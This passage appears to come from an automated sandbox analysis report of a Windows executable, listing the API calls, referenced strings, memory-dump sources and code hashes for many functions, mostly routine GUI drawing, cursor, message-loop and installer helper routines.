                                                                                        • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                        • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                        • String ID:
                                                                                        • API String ID: 1030595962-0
                                                                                        • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                        • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                        • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                        • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                        APIs
                                                                                        • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                        • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                        • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                        • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                        • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                        • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                        • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                        • String ID:
                                                                                        • API String ID: 2222416421-0
                                                                                        • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                        • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                        • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                        • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                          • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                          • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                          • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                        • TranslateMessage.USER32(?), ref: 004573B3
                                                                                        • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                        • String ID: [Paused]
                                                                                        • API String ID: 1007367021-4230553315
                                                                                        • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                        • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                        • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                        • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                        APIs
                                                                                        • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                        • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                        • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LoadSleep
                                                                                        • String ID: CheckPassword
                                                                                        • API String ID: 4023313301-1302249611
                                                                                        • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                        • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                        • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                        • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                        APIs
                                                                                          • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                          • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                          • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                        • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                        • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                        • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                        • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                        Strings
                                                                                        • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                        • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                        • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                        • API String ID: 613034392-3771334282
                                                                                        • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                        • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                        • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                        • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                        Strings
                                                                                        • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                        • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                        • CreateAssemblyCache, xrefs: 00459836
                                                                                        • Fusion.dll, xrefs: 004597DF
                                                                                        • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                        • API String ID: 190572456-3990135632
                                                                                        • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                        • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                        • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                        • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                        APIs
                                                                                          • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                        • GetFocus.USER32 ref: 0041C168
                                                                                        • GetDC.USER32(?), ref: 0041C174
                                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                        • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                        • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                        • String ID:
                                                                                        • API String ID: 3303097818-0
                                                                                        • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                        • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                        • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                        • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                        • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                        • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                          • Part of subcall function 004107F8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                        • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                        • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                        • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                        • 6F530860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$C400C740F530860F532980
                                                                                        • String ID:
                                                                                        • API String ID: 209721339-0
                                                                                        • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                        • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                        • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                        • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                        • API String ID: 47109696-2530820420
                                                                                        • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                        • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                        • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                        • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                        APIs
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$Delete$Stretch
                                                                                        • String ID:
                                                                                        • API String ID: 1458357782-0
                                                                                        • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                        • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                        • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                        • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00495519
                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                        • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                        Strings
                                                                                        • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                        • API String ID: 2948443157-222967699
                                                                                        • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                        • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                        • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                        • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                        APIs
                                                                                        • GetCursorPos.USER32 ref: 004233AF
                                                                                        • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                        • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                        • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                        • SetCursor.USER32(00000000), ref: 00423413
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1770779139-0
                                                                                        • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                        • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                        • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                        • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0217C330,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0217C330,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0217C330,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0217C330,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                        • String ID: ,0e$|0e
                                                                                        • API String ID: 730355536-1358723455
                                                                                        • Opcode ID: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                                                        • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                        • Opcode Fuzzy Hash: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                                                        • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                        • API String ID: 667068680-2254406584
                                                                                        • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
